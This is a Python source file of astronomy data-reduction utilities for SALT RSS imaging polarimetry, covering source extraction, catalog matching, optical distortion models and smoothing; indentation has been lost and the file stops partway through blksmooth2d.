# impolguide(YX_dt,yx_dpt,yxOEoff_d,wavl,coltem,camtem,debug=False,name='')
# Tableinterp(Tab,interpkey,interp_x)
# rotate2d(yx_ds, rot, center=np.zeros(2))
# boxsmooth1d(ar_x,ok_x,xbox,blklim)
# blksmooth2d(ar_rc,ok_rc,rblk,cblk,blklim,mode="mean",debug=False)
# fence(arr)
# printstdlog(string,logfile)
import os, sys, glob, copy, shutil, inspect
import numpy as np
from scipy import linalg as la
from specpolutils import rssdtralign, datedfile
from scipy.interpolate import interp1d, griddata
from astropy.io import fits as pyfits
from astropy.io import ascii
import astropy.table as ta
datadir = os.path.dirname(__file__) + '/data/'
# ---------------------------------------------------------------------------------
def sextract(fits,sigma=5.,deblend=.005,minpix=10,fwhmlo=0.6,fwhmhi=1.5,cull=False,logfile='salt.log',debug=False):
# run sextractor to find objects
# sigma=DETECT_THRESH is 3 in qred.sex. 5 is more reasonable default
# Version 3, returns catalog as a astropy Table with fields named as in SeXtract
hdulist_image = pyfits.open(fits)
shape_d = np.asarray(hdulist_image["SCI"].data.shape)
rcbin_d = np.array(hdulist_image[0].header["CCDSUM"].split(" ")).astype(int)
image_rc = np.copy(hdulist_image["SCI"].data)
pix_scale=0.125
r_ap=2.0/(pix_scale*rcbin_d.min())
sat=0.99*image_rc.max()
sexparamlist = ["X_IMAGE","Y_IMAGE","MAG_APER(1)","MAGERR_APER(1)","FLUX_ISO","FLUXERR_ISO", \
"FLUX_MAX","THETA_IMAGE","ELLIPTICITY","FWHM_IMAGE","FLAGS","CLASS_STAR","EXT_NUMBER"]
np.savetxt("sxtr_findstars.param",sexparamlist,fmt="%s")
cmd= ('sex %s -c '+datadir+'qred.sex -PARAMETERS_NAME %s -CATALOG_NAME %s -DETECT_THRESH %f '+ \
'-PHOT_APERTURES %f -SATUR_LEVEL %f -DEBLEND_MINCONT %f -DETECT_MINAREA %i') \
% (fits, "sxtr_findstars.param", "out.txt", sigma, r_ap, sat, deblend, minpix)
if debug:
os.system(cmd+" &> "+fits.replace(".fits","_debug.txt"))
else:
os.system(cmd+" &> /dev/null")
if (not os.path.exists("out.txt")):
printstdlog( "call to SeXtractor failed",logfile)
exit()
sextab = ascii.read("out.txt",names=sexparamlist)
sextab = sextab[:][sextab['EXT_NUMBER']==1]
sextab.remove_column('EXT_NUMBER') # only use ext=1 extension in MEF
if cull:
rc_ds = np.array([sextab["Y_IMAGE"],sextab["X_IMAGE"]])
fl_s = sextab["FLUX_ISO"]
fw_s = sextab["FWHM_IMAGE"]
stars = fl_s.shape[0]
if debug: printstdlog( 'SeXtract total: '+str(stars), logfile)
# combine well-detected stars closer than 1.5 bin
ok_s = np.ones(stars,dtype=bool)
minsep = 1.5
dist_ss = np.sqrt(((rc_ds[:,:,None] - rc_ds[:,None,:])**2).sum(axis=0))
comb_ss = (dist_ss < minsep).astype(int)
rc_ds = (comb_ss[None,:,:]*fl_s[None,None,:]*rc_ds[:,None,:]).sum(axis=2)
fl_s = (comb_ss*fl_s[None,:]).sum(axis=1)
rc_ds /= fl_s
fw_s = np.sqrt(((comb_ss*fw_s[None,:]).max(axis=1))**2 + ((comb_ss*dist_ss).mean(axis=1))**2)
for s in range(stars):
if ok_s[s]:
flagoff_s = ((np.eye(stars)[s] == 0) & (comb_ss[s] > 0))
ok_s[flagoff_s] = False
# get rid of non-stars based on fwhm compared to median
fwhmmed = np.median(fw_s[ok_s])
ok_s &= ((fw_s > fwhmlo*fwhmmed) & (fw_s < fwhmhi*fwhmmed))
Stars = ok_s.sum()
s_S = np.where(ok_s)[0]
sextabcull = sextab[s_S]
if debug:
printstdlog( 'After duplicate and FWHM cull: '+str(Stars),logfile)
np.savetxt(fits.replace(".fits","_sxtr_culled.txt"),sextabcull, \
fmt=6*"%12.4f "+4*"%10.3f "+"%4i %6.2f")
if debug:
np.savetxt(fits.replace(".fits","_sxtr.txt"),sextab, \
fmt=6*"%12.4f "+4*"%10.3f "+"%4i %6.2f")
else:
os.remove("sxtr_findstars.param")
os.remove("out.txt")
if cull: return sextabcull, sextab
else: return sextab
# ------------------------------------
def catid(yxcat_dt, yxcand_ds, offsettol=10., errtol=4.,debug=False,logfile='salt.log',name=''):
"""identify candidate positions in a catalog prediction, using 2D histogram of offset vectors
Parameters:
yxcat_dt: 2d numarray input coordinates for catalog
_d: 0,1 for y,x
_t: "target" index of catalog inputs
yxcand_ds: 2d numarray input coordinates for catalog
_d: 0,1 for y,x
_s: "star" index of candidate inputs
offsettol: float mm
use to set size of offset histogram
errtol: float mm
use to set size of histogram bins
Returns: t_i,s_i
arrays of catalog and found indices for id'd pairs _i
"""
# find similar offset vectors.
# form 2d histogram of offset, over +/- 2*offsettol in errtol bins
targets = yxcat_dt.shape[1]
candidates = yxcand_ds.shape[1]
offyx_dts = (yxcand_ds[:,None,:] - yxcat_dt[:,:,None])
offhist_yx,yedge,xedge = np.histogram2d(offyx_dts[0].flatten(),offyx_dts[1].flatten(), \
bins=np.arange(-2*offsettol,2*offsettol+errtol,errtol))
# ids in 3x3 histogram block surrounding histogram max
j,i = np.array(np.where(offhist_yx==np.max(offhist_yx))).T[0]
ok_ts = ((offyx_dts[0] > yedge[max(0,j-1)]) & (offyx_dts[0] < yedge[min(j+2,yedge.shape[0]-1)])) & \
((offyx_dts[1] > xedge[max(0,i-1)]) & (offyx_dts[1] < xedge[min(i+2,xedge.shape[0]-1)]))
offyx_d = np.array([np.median(offyx_dts[0][ok_ts]),np.median(offyx_dts[1][ok_ts])])
roff_ts = np.sqrt(((offyx_dts - offyx_d[:,None,None])**2).sum(axis=0))
t_i = np.where(ok_ts)[0]
s_i = np.where(ok_ts)[1]
roff_i = roff_ts[t_i,s_i]
ids = ok_ts.sum()
uniquetargetids = np.unique(t_i).shape[0]
uniquecandids = np.unique(s_i).shape[0]
if debug:
printstdlog ((("Catalog entries %3i, Candidates %3i") % (targets,candidates)),logfile)
printstdlog (((" Ids %3i, unique targets %3i, unique candidates %3i") % \
(ids,uniquetargetids,uniquecandids)),logfile)
printstdlog (((" yx offset (mm): %8.3f %8.3f") % tuple(offyx_d)),logfile)
np.savetxt(name+"catid1.txt", np.vstack((t_i,s_i,yxcat_dt[:,t_i],yxcand_ds[:,s_i], \
offyx_dts[:,t_i,s_i])).T,fmt="%4i %4i "+6*"%8.3f ")
np.savetxt(name+"idhist.txt", offhist_yx, fmt="%3i")
sbest_t = np.argmin(roff_ts,axis=1)
np.savetxt(name+"sbest_t.txt",np.vstack((np.arange(targets),sbest_t, \
roff_ts[range(targets),sbest_t], yxcat_dt,yxcand_ds[:,sbest_t])).T, \
fmt="%4i %4i %7.3f "+4*"%8.3f ")
# get best id in case of multiple id's of same target
roffmin_t = roff_ts.min(axis=1)
okt_i = np.in1d(roff_i,roffmin_t[t_i])
ids = okt_i.sum()
uniquecandids = np.unique(s_i[okt_i]).shape[0]
if ((ids < ok_ts.sum()) and debug):
printstdlog (((" Ids %3i, unique candidates %3i") % (ids,uniquecandids)),logfile)
np.savetxt(name+"catid2.txt", np.vstack((t_i[okt_i],s_i[okt_i],yxcat_dt[:,t_i[okt_i]], \
yxcand_ds[:,s_i[okt_i]],offyx_dts[:,t_i[okt_i],s_i[okt_i]])).T,fmt="%4i %4i "+6*"%8.3f ")
# get best id in case of multiple id's of same candidate
roffmin_s = roff_ts.min(axis=0)
okts_i = np.in1d(roff_i,roffmin_s[s_i[okt_i]])
ids = okts_i.sum()
if ((ids < okt_i.sum()) and debug):
printstdlog (((" Ids %3i") % ids),logfile)
np.savetxt(name+"catid3.txt", np.vstack((t_i[okts_i],s_i[okts_i],yxcat_dt[:,t_i[okts_i]], \
yxcand_ds[:,s_i[okts_i]],offyx_dts[:,t_i[okts_i],s_i[okts_i]])).T,fmt="%4i %4i "+6*"%8.3f ")
return t_i[okts_i],s_i[okts_i]
# ------------------------------------
def ccdcenter(image_rc):
"""find gaps and center of ccd image
Parameters:
image_rc: 2d image
Returns: rccenter_d (int r,c of center), cgap_c (int column of 4 gap edges)
"""
image_c = image_rc.mean(axis=0)
rows,cols = image_rc.shape
cstart = 0
cedge_id = np.zeros((3,2),dtype=int)
for i in (0,1,2):
cedge_id[i,0] = np.argmax((image_c[cstart: ] != 0)&(image_c[cstart: ] != -1)) + cstart
cedge_id[i,1] = np.argmax((image_c[cedge_id[i,0]: ] == 0)| \
(image_c[cedge_id[i,0]: ] == -1)) + cedge_id[i,0] - 1
if cedge_id[i,1] == cedge_id[i,0]-1: cedge_id[i,1] = cols-1
cstart = cedge_id[i,1]+1
rccenter_d = np.array([rows/2,cedge_id[1].mean()])
return rccenter_d,cedge_id.flatten()[1:5]
# ------------------------------------
def gaincor(hdul):
""" get gain correction data for an image
Parameters:
hdul: hduList for image
Returns: np 1D array gaincor_c. Divide column c in image by gaincor_c
"""
# assumes data final 2 dimensions are row,col
rows,cols = hdul['SCI'].data.shape[-2:]
cbin, rbin = [int(x) for x in hdul[0].header['CCDSUM'].split(" ")]
dateobs = hdul[0].header['DATE-OBS'].replace('-','')
utchour = int(hdul[0].header['UTC-OBS'].split(':')[0])
mjdateobs = str(int(dateobs) - int(utchour < 10))
gain = hdul[0].header['GAINSET']
speed = hdul[0].header['ROSPEED']
rccenter_d, cgap_c = ccdcenter(hdul['SCI'].data.flat[:rows*cols].reshape(rows,cols))
c_a = np.array([0, cgap_c[0]-1024/cbin+1, cgap_c[[0,1]].mean(), \
cgap_c[1]+1024/cbin, cgap_c[[2,3]].mean(), cgap_c[3]+1024/cbin, cols])
gaincor_c = np.ones(cols)
GainCorrectionFile = datedfile(datadir+"RSS_Gain_Correction_yyyymmdd_vnn.txt",mjdateobs)
if (len(GainCorrectionFile)==0): return gaincor_c
mode_ld = np.loadtxt(GainCorrectionFile, dtype='string', usecols=(0,1))
lmode = np.where((mode_ld[:,0]==gain) & (mode_ld[:,1] == speed))[0][0]
gaincor_a = np.loadtxt(GainCorrectionFile, usecols=range(2,8), unpack=True).T[lmode]
for a in range(6):
if (gaincor_a[a] == 1.): continue
isa_c = ((np.arange(cols) >= c_a[a]) & (np.arange(cols) < c_a[a+1]))
gaincor_c[isa_c] = gaincor_a[a]
return gaincor_c
# ------------------------------------
def YXcalc(ra_t,dec_t,RAd,DECd,PAd,fps):
"""compute YX SALT fov positions (mm from LOS)
Parameters:
ra_t: 1d numarray, RA (degrees) for targets _t
dec_t: 1d numarray, Dec (degrees) for targets _t
RAd, DECd, PAd: RA, Dec, PA of LOS (degrees)
fps: SALT focal plane scale (micron/arcsec)
Returns: YX_dt (mm)
"""
PAr = np.radians(PAd)
Y_t = 3.6*fps*(np.cos(np.radians(dec_t))*(ra_t-RAd)*np.sin(PAr) + \
(dec_t-DECd)*np.cos(PAr))
X_t = 3.6*fps*(-np.cos(np.radians(dec_t))*(ra_t-RAd)*np.cos(PAr) + \
(dec_t-DECd)*np.sin(PAr))
return np.array([Y_t,X_t])
# ------------------------------------
def RSScoldistort(YX_ds,wav_s,coltem,distTab=[],debug=False):
"""apply collimator distortion to array of Y,X coordinates
Parameters:
YX_ds: 2d numarray input coordinates (mm, SALT focal plane)
_d: 0,1 for Y,X
_s: index of inputs
wav_s: 1d numarray (or float, if all the same) wavelength (Ang)
disttab: astropy Table of distortion model parameters, vs wavelength
Returns: alfyx_ds (degrees) angles in collimated space
"""
stars = YX_ds.shape[1]
if np.isscalar(wav_s): wav_s = np.repeat(wav_s,stars)
imgoptfile = datadir+'RSSimgopt.txt'
if len(distTab)==0:
distTab = ascii.read(imgoptfile,data_start=1, \
names=['Wavel','Fcoll','Acoll','Bcoll','ydcoll','xdcoll','Fcam','acam','alfydcam','alfxdcam'])
dFcoldt,dFcamdt = ascii.read(imgoptfile,data_end=1)[0]
sdistTab = Tableinterp(distTab,'Wavel',wav_s)
Fcam,Fcoll = Tableinterp(distTab,'Wavel',5500.)['Fcam','Fcoll'][0]
YXdcoll_ds = np.array([sdistTab['ydcoll'],sdistTab['xdcoll']])* Fcoll/Fcam
# correct for collimator distortion
Rd_s = np.sqrt(((YX_ds - YXdcoll_ds)**2).sum(axis=0))/50.
dist_s = (1. + sdistTab['Acoll']*Rd_s**2 + sdistTab['Bcoll']*Rd_s**4)
YXd_ds = YXdcoll_ds + dist_s*(YX_ds - YXdcoll_ds)
alfyx_ds = np.degrees(YXd_ds/(sdistTab['Fcoll'] + dFcoldt*(coltem - 7.5)))
if debug: np.savetxt("coldist.txt",np.vstack((wav_s,YX_ds,dist_s,YXd_ds,alfyx_ds)).T, \
fmt=3*"%7.2f "+"%10.4f "+2*"%7.2f "+2*"%9.4f ")
return alfyx_ds
# ------------------------------------
def RSScamdistort(alfyx_ds,wav_s,camtem,distTab=[],debug=False):
"""apply camera distortion to array of y,x ray angles
Parameters:
alfyx_ds: 2d numarray input coordinates (deg)
_d: 0,1 for y,x
_s: index of inputs
wav_s: 1d numarray (or float, if all the same) wavelength (Ang)
disttab: astropy Table of distortion model parameters, vs wavelength
Returns: yx_ds (mm) at the detector
"""
stars = alfyx_ds.shape[1]
if np.isscalar(wav_s): wav_s = np.repeat(wav_s,stars)
imgoptfile = datadir+'RSSimgopt.txt'
if len(distTab)==0:
distTab = ascii.read(imgoptfile,data_start=1, \
names=['Wavel','Fcoll','Acoll','Bcoll','ydcoll','xdcoll','Fcam','acam','alfydcam','alfxdcam'])
dFcoldt,dFcamdt = ascii.read(imgoptfile,data_end=1)[0]
sdistTab = Tableinterp(distTab,'Wavel',wav_s)
alfyxdcam_ds = np.array([sdistTab['alfydcam'],sdistTab['alfxdcam']])
# correct for camera distortion
alfrd_s = np.sqrt(((alfyx_ds - alfyxdcam_ds)**2).sum(axis=0))/5.
dist_s = (1. + sdistTab['acam']*alfrd_s**2)
alfyxd_ds = alfyxdcam_ds + dist_s*(alfyx_ds - alfyxdcam_ds)
yx_ds = (sdistTab['Fcam'] + dFcamdt*(camtem - 7.5))*np.radians(alfyxd_ds)
if debug: np.savetxt("camdist.txt",np.vstack((wav_s,alfyx_ds,dist_s,alfyxd_ds,yx_ds)).T, \
fmt="%7.2f "+5*"%10.4f "+2*"%7.2f ")
return yx_ds
# ------------------------------------
def RSSpolsplit(alfyx_ds,wav_s,mag=.99779,distTab=[],paramTab=[],debug=False):
"""apply wollaston prism distortion and splitting for beam OE to array of y,x angles
Parameters:
alfyx_ds: 2d numarray input angles (deg), relative to optical axis
_d: 0,1 for y,x
_s: index of input targets
wav_s: float or 1d numarray float
wavelength (Ang) for point s. If not an array, use for all points
disttab: astropy Table of distortion model parameters for this beam, vs wavelength
Returns: w-distorted and deviated alfyx_dps, (_p = 0,1 for O,E), relative to optical axis
"""
stars = alfyx_ds.shape[1]
if np.isscalar(wav_s): wav_s = np.repeat(wav_s,stars)
poldistfile = datadir+'RSSpoldist.txt'
if len(paramTab)==0:
paramTab = ascii.read(poldistfile, data_end=1, names=['bsrot','yoff','xoff'])
paramTab = ta.hstack([paramTab,ascii.read(poldistfile, data_start=1, data_end=2, \
names=['EOy_0','EOy_Y','EOy_YY','EOy_XX','EOx_0','EOx_X','EOx_XY','EOx_XXX'])])
if len(distTab)==0:
distTab = ascii.read(poldistfile, data_start=2, \
names = ['Wavel','y_0','y_Y','y_YY','y_XX','x_0','x_X','x_XY','x_XXX'])
sdistTab = Tableinterp(distTab,'Wavel',wav_s)
alfyxout_dps = np.zeros((2,2,stars))
bsrot, yoff, xoff = paramTab['bsrot','yoff','xoff'][0]
for p in (0,1):
# rotate about alf=0,0 into prism ref, apply distortion, rotate back out
alfyxin_ds = mag*rotate2d(alfyx_ds,-bsrot)
alfyout_s = yoff + sdistTab['y_0'] + sdistTab['y_Y']*alfyxin_ds[0] + \
0.001*sdistTab['y_YY']*alfyxin_ds[0]**2 + 0.001*sdistTab['y_XX']*alfyxin_ds[1]**2
alfxout_s = xoff + sdistTab['x_0'] + sdistTab['x_X']*alfyxin_ds[1] + \
0.001*sdistTab['x_XY']*alfyxin_ds[1]*alfyxin_ds[0] + 0.001*sdistTab['x_XXX']*alfyxin_ds[1]**3
alfyxout_dps[:,p] = rotate2d(np.array([alfyout_s,alfxout_s]),bsrot)
# second pass is E, name[2:] strips off the 'EO'
for name in paramTab.colnames[3:]: sdistTab[name[2:]] *= paramTab[name]
return alfyxout_dps
# ---------------------------------------------------------------------------------
def RSScolpolcam(YX_ds, wav_s, coltem, camtem, yxOEoff_d=np.zeros(2)):
# complete RSS distortion for polarimetric data
alfyxo_ds = RSScoldistort(YX_ds,wav_s,coltem)
alfyxow_dps = RSSpolsplit(alfyxo_ds,wav_s)
if np.isscalar(wav_s):
wav_S = wav_s
else:
wav_S = np.tile(wav_s,2)
yxowa_dps = RSScamdistort(alfyxow_dps.reshape((2,-1)),wav_S,camtem).reshape((2,2,-1))
yxowa_dps += (np.array([[-.5,.5],[-.5,.5]])*yxOEoff_d[:,None])[:,:,None]
return yxowa_dps
# ------------------------------------
def RSSpolgeom(hdul,wavl,yxOEoff_d=np.zeros(2)):
"""Return imaging polarimetric layout
Parameters
----------
hdul: HDU list for relavant image
wavl: float, wavelength (Ang)
yxOEoff_d: 1D float numpy array, optional y,x offset to RSScolpolcam nominal E-O
Returns
----------
yx0_dp: 2D float numpy array, [[y0_O,x0_O],[y0_E,x0_E]].
mm position of O,E optic axes at this wavelength relative to imaging optic axis
rshift: int, row of OE FOV split point - imaging CCD center row (5000 Ang)
yxp0_dp: 2D float numpy array,
mm position of center of split O,E images relative to O,E optic axes at this wavelength
isfov_rc: 2D boolean numpy array, (full image) true inside FOV for O and E
"""
data_rc = hdul[1].data
rows, cols = data_rc.shape[-2:]
if len(data_rc.shape)>2: # allow for pol split data
rows = 2*rows
data_rc = data_rc[0]
cbin, rbin = [int(x) for x in hdul[0].header['CCDSUM'].split(" ")]
rcbin_d = np.array([rbin,cbin])
rccenter_d, cgapedge_c = ccdcenter(data_rc)
camtem = hdul[0].header['CAMTEM']
coltem = hdul[0].header['COLTEM']
dateobs = hdul[0].header['DATE-OBS'].replace('-','')
trkrho = hdul[0].header['TRKRHO']
pixmm = 0.015
ur0,uc0,saltfps = rssdtralign(dateobs,trkrho) # ur, uc =unbinned pixels, saltfps =micr/arcsec
yx0_d = -0.015*np.array([ur0,uc0]) # mm position of center in imaging from optical axis
dyx_dp = np.array([[-.5,.5],[-.5,.5]])*yxOEoff_d[:,None]
dy = 2.01 # pol fov height in arcmin
dr = 3.97 # pol fov radius in arcmin
xcnr = np.sqrt((dr**2-dy**2))
YXfov_dt = np.array([[-dy,-dy,-dy, 0.,0.,0., dy,dy,dy], \
[-xcnr,0.,xcnr,-dr,0.,dr,-xcnr,0.,xcnr]])*60.*saltfps/1000.
yxfov_dpt = RSScolpolcam(YXfov_dt,wavl,coltem,camtem) + dyx_dp[:,:,None]
yx0_dp = yxfov_dpt[:,:,4]
yxfovmean_dpt = RSScolpolcam(YXfov_dt,5000.,coltem,camtem) + dyx_dp[:,:,None]
yxsep_d = 0.5*(yxfovmean_dpt[:,0,7] + yxfovmean_dpt[:,1,1]) # beam fov separation point
rshift = int(np.trunc((yxsep_d-yx0_d)[0]/(rcbin_d[0]*pixmm))) # split row offset, same whole obs
yxp0_dp = yx0_d[:,None] - (yx0_dp + \
rcbin_d[0]*pixmm*np.array([[-rshift+rows/4,-rshift-rows/4],[0.,0.]]))
rc0_dp = (yx0_dp-yx0_d[:,None])/(rcbin_d[:,None]*pixmm) + rccenter_d[:,None]
cfovrad_p = (yxfov_dpt[1,:,5] - yx0_dp[1])/(rcbin_d[1]*pixmm)
rfovup0_p = (yxfov_dpt[0,:,7] - yx0_dp[0])/(rcbin_d[0]*pixmm)
rfovdn0_p = (yx0_dp[0] - yxfov_dpt[0,:,1])/(rcbin_d[0]*pixmm)
rfovupcv_p = (yxfov_dpt[0,:,8] - yxfov_dpt[0,:,7])/(rcbin_d[0]*pixmm)
rfovdncv_p = (yxfov_dpt[0,:,1] - yxfov_dpt[0,:,2])/(rcbin_d[0]*pixmm)
ccnr = yxfov_dpt[1,0,8]/(rcbin_d[1]*pixmm)
dr_pr = np.arange(rows)[None,:] - rc0_dp[0,:][:,None]
dc_pc = np.arange(cols)[None,:] - rc0_dp[1,:][:,None]
isfov_rc = np.zeros((rows,cols),dtype=bool)
for p in (0,1):
isfov_rc |= ((np.sqrt(dr_pr[p,:,None]**2 + dc_pc[p,None,:]**2) < cfovrad_p[p,None,None]) & \
(dr_pr[p,:,None] < (rfovup0_p[p,None,None] + rfovupcv_p[p,None,None]*(dc_pc[p,None,:]/ccnr)**2)) & \
(dr_pr[p,:,None] > -(rfovdn0_p[p,None,None] + rfovdncv_p[p,None,None]*(dc_pc[p,None,:]/ccnr)**2)))
gapcolList = range(cgapedge_c[0],cgapedge_c[1])+range(cgapedge_c[2],cgapedge_c[3])
isfov_rc[:,gapcolList] = False
return yx0_dp, rshift, yxp0_dp, isfov_rc
# ----------------------------------------------
def impolguide(YX_dt,yx_dpt,yxOEoff_d,wavl,coltem,camtem,fitOEoff=True,debug=False,name=''):
# Least squares fit of dY,dX,drot and dyOEoff,dxOEoff of star offset from predicted target position
targets = YX_dt.shape[1]
dYX = 0.1 # offset for derivative
dYX_t = 0.1*np.ones(targets)
yxcat_dpt = RSScolpolcam(YX_dt,wavl,coltem,camtem)
yxcatY_dpt = RSScolpolcam(YX_dt+np.array([dYX_t,np.zeros(targets)]),wavl,coltem,camtem)
yxcatX_dpt = RSScolpolcam(YX_dt+np.array([np.zeros(targets),dYX_t]),wavl,coltem,camtem)
dydY_pt = (yxcatY_dpt - yxcat_dpt)[0]/dYX
dxdX_pt = (yxcatX_dpt - yxcat_dpt)[1]/dYX
off_dp = np.array([[-.5,.5],[-.5,.5]])
dyx_dpt = yx_dpt - (yxcat_dpt + (off_dp*yxOEoff_d[:,None])[:,:,None])
# Fit: dyx_dpt = [dY*dydY_pt,dX*dxdX_pt] + drot*[X*dydY_pt,-Y*dxdX_pt] + off_dp*dyxOEoff_d
cofs = [2,5][fitOEoff]
A_SC = np.zeros((4*targets,cofs))
A_SC[:2*targets,0] = dydY_pt.flatten()
A_SC[2*targets:,1] = dxdX_pt.flatten()
if fitOEoff:
A_SC[:2*targets,2] = (YX_dt[1][None,:]*dydY_pt).flatten()
A_SC[2*targets:,2] = -(YX_dt[0][None,:]*dxdX_pt).flatten()
A_SC[:2*targets,3] = np.repeat(off_dp[0,:,None],targets,axis=1).flatten()
A_SC[2*targets:,4] = np.repeat(off_dp[1,:,None],targets,axis=1).flatten()
if debug:
np.savetxt(name+"A_SC.txt",A_SC,fmt="%8.2f")
np.savetxt(name+"B_S.txt",dyx_dpt.flatten(),fmt="%8.2f")
cof_C,sumsqerr = la.lstsq(A_SC,dyx_dpt.flatten())[:2] # here is the fit
eps_CC = la.inv((A_SC[:,:,None]*A_SC[:,None,:]).sum(axis=0))
std_C = np.sqrt((sumsqerr/targets)*np.diagonal(eps_CC))
dYX_d = cof_C[0:2]
dYXerr_d = std_C[0:2]
if fitOEoff:
drot = np.degrees(cof_C[2])
droterr = np.degrees(std_C[2])
dyxOEoff_d = cof_C[3:]
dyxOEofferr_d = std_C[3:]
else:
drot = 0.
droterr = 0.
dyxOEoff_d = np.zeros(2)
dyxOEofferr_d = np.zeros(2)
return dYX_d,drot,dyxOEoff_d,dYXerr_d,droterr,dyxOEofferr_d
# ---------------------------------------------------------------------------------
def Tableinterp(Tab,interpkey,interp_x):
# make a new table, interpolated on specified key
if np.isscalar(interp_x): interp_x = np.array([interp_x,])
names = Tab.colnames
newTab = ta.Table(np.zeros((interp_x.shape[0],len(names))),names=names)
newTab[interpkey] = interp_x
interp_X = Tab[interpkey]
names.remove(interpkey)
for name in names:
if len(Tab) > 1:
newTab[name] = interp1d(interp_X,Tab[name],kind='cubic')(interp_x)
else:
newTab[name] = Tab[name].repeat(interp_x.shape[0])
return newTab
# ----------------------------------------------------------
def rotate2d(yx_ds, rot, center=np.zeros(2)):
"""rotate an array of 2d coordinates
Parameters:
yx_ds: 2d numarray of 2d coordinates
_d: 0,1 for y,x
_s: index of coordinates
rot: amount to rotate (degrees)
center: y,x coordinates of rotation center (default 0,0)
"""
c = np.cos(np.radians(rot))
s = np.sin(np.radians(rot))
rotate = np.transpose([[c, s],[-1.*s, c]])
yx1_ds = yx_ds - center[:,None]
yxout_ds = (np.dot(yx1_ds.T,rotate)).T
yxout_ds += center[:,None]
return yxout_ds
# ---------------------------------------------------------------------------------
def boxsmooth1d(ar_x,ok_x,xbox,blklim):
# sliding boxcar average (using okmask, with ok points in > blklim fraction of the box)
# ar_x: float nparray; ok_x = bool nparray
# xbox: int; blklim: float
arr_x = ar_x*ok_x
bins = ar_x.shape[0]
kernal = np.ones(xbox)
if xbox/2. == 0:
kernal[0] = 0.5
kernal = np.append(kernal,0.5)
nkers = kernal.shape[0]
valmask_x = np.convolve(arr_x,kernal)[(nkers-1)/2:(nkers-1)/2+bins]
count_x = np.convolve(ok_x,kernal)[(nkers-1)/2:(nkers-1)/2+bins]
arr_x = np.zeros(bins)
okbin_x = count_x > xbox*blklim
arr_x[okbin_x] = valmask_x[okbin_x]/count_x[okbin_x]
return arr_x
# ---------------------------------------------------------------------------------
def blksmooth2d(ar_rc,ok_rc,rblk,cblk,blklim,mode="mean",debug=False):
# blkaverage (using mask, with blks with > blklim fraction of the pts), then spline interpolate result
# optional: median instead of mean
rows,cols = ar_rc.shape
arr_rc = np.zeros_like(ar_rc)
arr_rc[ok_rc] = ar_rc[ok_rc]
r_rc,c_rc = np.indices((rows,cols)).astype(float)
# equalize block scaling to avoid triangularization failure
rblk,cblk = max(rblk,cblk), max(rblk,cblk)
rcenter = (np.where(ok_rc)[0][-1] + np.where(ok_rc)[0][0])/2
ccenter = ((np.where(ok_rc)[1]).max() + (np.where(ok_rc)[1]).min())/2
drdat = (np.where(ok_rc)[0][-1] - np.where(ok_rc)[0][0])
dcdat = ((np.where(ok_rc)[1]).max() - (np.where(ok_rc)[1]).min())
rblks,cblks = int(np.ceil(float(drdat)/rblk)),int(np.ceil(float(dcdat)/cblk))
r0 = min(max(0,rcenter-rblk*rblks/2),rows-rblk*rblks)
c0 = min(max(0,ccenter-cblk*cblks/2),cols-cblk*cblks)
arr_RCb = arr_rc[r0:(r0+rblk*rblks),c0:(c0+cblk*cblks)] \
.reshape(rblks,rblk,cblks,cblk).transpose(0,2,1,3).reshape(rblks,cblks,rblk*cblk)
ok_RCb = ok_rc[r0:(r0+rblk*rblks),c0:(c0+cblk*cblks)] \
.reshape(rblks,rblk,cblks,cblk).transpose(0,2,1,3).reshape(rblks,cblks,rblk*cblk)
r_RCb = ((ok_rc*r_rc)[r0:(r0+rblk*rblks),c0:(c0+cblk*cblks)]) \
.reshape(rblks,rblk,cblks,cblk).transpose(0,2,1,3).reshape(rblks,cblks,rblk*cblk)
c_RCb = ((ok_rc*c_rc)[r0:(r0+rblk*rblks),c0:(c0+cblk*cblks)]) \
.reshape(rblks,rblk,cblks,cblk).transpose(0,2,1,3).reshape(rblks,cblks,rblk*cblk)
ok_RC = ok_RCb.sum(axis=-1) > rblk*cblk*blklim
arr_RC = np.zeros((rblks,cblks))
if mode == "mean":
arr_RC[ok_RC] = arr_RCb[ok_RC].sum(axis=-1)/ok_RCb[ok_RC].sum(axis=-1)
elif mode == "median":
arr_RC[ok_RC] = np.median(arr_RCb[ok_RC],axis=-1)
else:
print "Illegal mode "+mode+" for smoothing"
exit()
r_RC = np.zeros_like(arr_RC); c_RC = np.zeros_like(arr_RC)
r_RC[ok_RC] = r_RCb[ok_RC].sum(axis=-1)/ok_RCb[ok_RC].sum(axis=-1)
c_RC[ok_RC] = c_RCb[ok_RC].sum(axis=-1)/ok_RCb[ok_RC].sum(axis=-1)
if debug:
np.savetxt('arr_RC.txt',arr_RC,fmt="%14.9f")
np.savetxt('ok_RC.txt',ok_RC,fmt="%2i")
# evaluate slopes at edge for edge extrapolation
dar_RC = ((arr_RC[1:,:]!=0.) & (arr_RC[:-1,:]!=0.)).astype(int) \
* (arr_RC[1:,:] - arr_RC[:-1,:])
dac_RC = ((arr_RC[:,1:]!=0.) & (arr_RC[:,:-1]!=0.)).astype(int) \
* (arr_RC[:,1:] - arr_RC[:,:-1])
dr_RC = r_RC[1:,:] - r_RC[:-1,:]
dc_RC = c_RC[:,1:] - c_RC[:,:-1]
dadr_RC = np.zeros_like(dar_RC); dadc_RC = np.zeros_like(dac_RC)
dadr_RC[dr_RC!=0] = dar_RC[dr_RC!=0]/dr_RC[dr_RC!=0]
dadc_RC[dc_RC!=0] = dac_RC[dc_RC!=0]/dc_RC[dc_RC!=0]
argR = np.where(ok_RC.sum(axis=1)>0)[0]
argC = np.where(ok_RC.sum(axis=0)>0)[0]
dadr_RC[argR[0],argC] *= (arr_RC[argR[0,],argC] > 0)
dadr_RC[argR[-1]-1,argC] *= (arr_RC[argR[-1],argC] > 0)
dadc_RC[argR,argC[0]] *= (arr_RC[argR,argC[0]] > 0)
dadc_RC[argR,argC[-1]-1] *= (arr_RC[argR,argC[-1]] > 0)
# force outer block positions into a rectangle to avoid edge effects, spline interpolate
r_RC[argR[[0,-1]][:,None],argC] = (r0+(rblk-1)/2.+rblk*argR[[0,-1]])[:,None]
c_RC[argR[:,None],argC[[0,-1]]] = (c0+(cblk-1)/2.+cblk*argC[[0,-1]])
ok_RC = ((r_RC > 0.) & (c_RC > 0.))
arr_rc = griddata((r_RC[ok_RC],c_RC[ok_RC]),arr_RC[ok_RC], \
tuple(np.mgrid[:rows,:cols].astype(float)),method='cubic',fill_value=0.)
if debug:
pyfits.PrimaryHDU(arr_rc.astype('float32')).writeto('arr_rc_0.fits',overwrite=True)
np.savetxt('r_RC_1.txt',r_RC,fmt="%9.2f")
np.savetxt('c_RC_1.txt',c_RC,fmt="%9.2f")
